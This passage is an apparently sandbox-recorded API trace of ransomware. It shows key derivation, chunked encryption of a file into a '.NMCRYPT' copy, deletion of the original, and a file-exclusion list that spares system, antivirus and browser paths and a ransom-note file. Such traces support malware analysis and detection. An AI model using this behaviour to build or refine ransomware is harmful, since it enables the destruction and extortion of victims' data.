dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.675] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0147.675] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0147.676] CryptCreateHash (in: hProv=0x8e32a8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444734 | out: phHash=0x1d444734) returned 1 [0147.676] CryptHashData (hHash=0x9ad5f8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0147.676] CryptDeriveKey (in: hProv=0x8e32a8, Algid=0x6610, hBaseData=0x9ad5f8, dwFlags=0x4, phKey=0x1d444738 | out: phKey=0x1d444738*=0x9ad578) returned 1 [0147.676] CryptSetKeyParam (hKey=0x9ad578, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0147.676] CryptSetKeyParam (hKey=0x9ad578, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0147.676] wcslen (_String="\\\\?\\") returned 0x4 [0147.676] CryptDuplicateKey (in: hKey=0x9ad578, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad278) returned 1 [0147.676] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnld.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0147.676] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnld.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0147.676] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=2626) returned 1 [0147.676] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0147.677] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.678] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.678] GetLastError () returned 0x0 [0147.678] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.679] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.679] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.679] GetLastError () returned 0x0 [0147.679] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.680] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.680] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.680] GetLastError () returned 0x0 [0147.680] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.680] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.680] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.680] GetLastError () returned 0x0 [0147.680] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.680] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.680] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.680] GetLastError () returned 0x0 [0147.680] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.680] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.680] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.680] GetLastError () returned 0x0 [0147.680] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.680] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.680] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.680] GetLastError () returned 0x0 [0147.680] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.680] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.680] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.681] GetLastError () returned 0x0 [0147.681] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.681] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.681] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.681] GetLastError () returned 0x0 [0147.681] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.681] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.681] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.681] GetLastError () returned 0x0 [0147.681] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.681] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x42, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x42, lpOverlapped=0x0) returned 1 [0147.681] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x42, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x50) returned 1 [0147.681] GetLastError () returned 0x0 [0147.681] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x50, lpOverlapped=0x0) returned 1 [0147.681] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0147.681] WriteFile (in: hFile=0x588, lpBuffer=0x1d421460*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0147.681] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnld.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml")) returned 0x20 [0147.681] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnld.xml", dwFileAttributes=0x20) returned 0 [0147.681] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnld.xml") returned 1 [0147.682] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnld.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml")) returned 0 [0147.682] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnld.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnld.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnld.xml" [0147.682] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnld.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink") returned 1 [0147.682] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB3D1.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb3d1.tmp")) returned 0xb3d1 [0147.682] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnld.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB3D1.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb3d1.tmp"), dwFlags=0x1) returned 0 [0147.682] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB3D1.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb3d1.tmp")) returned 1 [0147.683] CryptDestroyKey (hKey=0x9ad278) returned 1 [0147.683] wcslen (_String="OK") returned 0x2 [0147.683] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0147.683] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0147.683] CryptDestroyKey (hKey=0x9ad578) returned 1 [0147.683] CryptDestroyHash (hHash=0x9ad5f8) returned 1 [0147.683] CryptReleaseContext (hProv=0x8e32a8, dwFlags=0x0) returned 1 [0147.683] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0147.683] PathMatchSpecW (pszFile="ipsnor.xml", pszSpec="*NMCRYPT") returned 0 [0147.683] PathMatchSpecW (pszFile="ipsnor.xml", pszSpec="*Recovers your files.html") returned 0 [0147.683] PathMatchSpecW (pszFile="ipsnor.xml", pszSpec="*.exe") returned 0 [0147.683] PathMatchSpecW (pszFile="ipsnor.xml", pszSpec="*.dll") returned 0 [0147.683] PathMatchSpecW (pszFile="ipsnor.xml", pszSpec="*.lnk") returned 0 [0147.683] PathMatchSpecW (pszFile="ipsnor.xml", pszSpec="*.bat") returned 0 [0147.683] PathMatchSpecW (pszFile="ipsnor.xml", pszSpec="*.ini") returned 0 [0147.683] PathMatchSpecW (pszFile="ipsnor.xml", pszSpec="*.msi") returned 0 [0147.683] PathMatchSpecW (pszFile="ipsnor.xml", pszSpec="*.scf") returned 0 [0147.683] PathMatchSpecW (pszFile="ipsnor.xml", pszSpec="*pagefile.sys*") returned 0 [0147.683] PathMatchSpecW (pszFile="ipsnor.xml", pszSpec="*NTUSER.DAT*") returned 0 [0147.683] PathMatchSpecW (pszFile="ipsnor.xml", pszSpec="*AppData*") returned 0 [0147.683] PathMatchSpecW (pszFile="ipsnor.xml", pszSpec="*\\winrar\\*") returned 0 [0147.683] PathMatchSpecW (pszFile="ipsnor.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0147.683] PathMatchSpecW (pszFile="ipsnor.xml", pszSpec="*\\java\\*") returned 0 [0147.683] PathMatchSpecW (pszFile="ipsnor.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0147.683] PathMatchSpecW (pszFile="ipsnor.xml", pszSpec="*\\windows\\*") returned 0 [0147.683] PathMatchSpecW (pszFile="ipsnor.xml", pszSpec="*\\ESET\\*") returned 0 [0147.683] PathMatchSpecW (pszFile="ipsnor.xml", pszSpec="*\\AVG\\*") returned 0 [0147.683] PathMatchSpecW (pszFile="ipsnor.xml", pszSpec="*\\AVIRA\\*") returned 0 [0147.683] PathMatchSpecW (pszFile="ipsnor.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0147.683] PathMatchSpecW (pszFile="ipsnor.xml", pszSpec="*Atheros*") returned 0 [0147.683] PathMatchSpecW (pszFile="ipsnor.xml", pszSpec="*Realtek*") returned 0 [0147.683] PathMatchSpecW (pszFile="ipsnor.xml", pszSpec="*bootmgr*") returned 0 [0147.683] PathMatchSpecW (pszFile="ipsnor.xml", pszSpec="*boot*") returned 0 [0147.683] PathMatchSpecW (pszFile="ipsnor.xml", pszSpec="*boot*") returned 0 [0147.683] PathMatchSpecW (pszFile="ipsnor.xml", pszSpec="*CONFIG.SYS*") returned 0 [0147.683] PathMatchSpecW (pszFile="ipsnor.xml", pszSpec="*IO.SYS*") returned 0 [0147.683] PathMatchSpecW (pszFile="ipsnor.xml", pszSpec="*MSDOS.SYS*") returned 0 [0147.683] PathMatchSpecW (pszFile="ipsnor.xml", pszSpec="*NTDETECT.COM*") returned 0 [0147.683] PathMatchSpecW (pszFile="ipsnor.xml", pszSpec="*ntldr*") returned 0 [0147.684] PathMatchSpecW (pszFile="ipsnor.xml", pszSpec="*chrome*") returned 0 [0147.684] PathMatchSpecW (pszFile="ipsnor.xml", pszSpec="*opera*") returned 0 [0147.684] PathMatchSpecW (pszFile="ipsnor.xml", pszSpec="*firefox*") returned 0 [0147.684] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml", pszSpec="*") returned 1 [0147.684] strlen (_Str="NMoreira") returned 0x8 [0147.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.684] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] 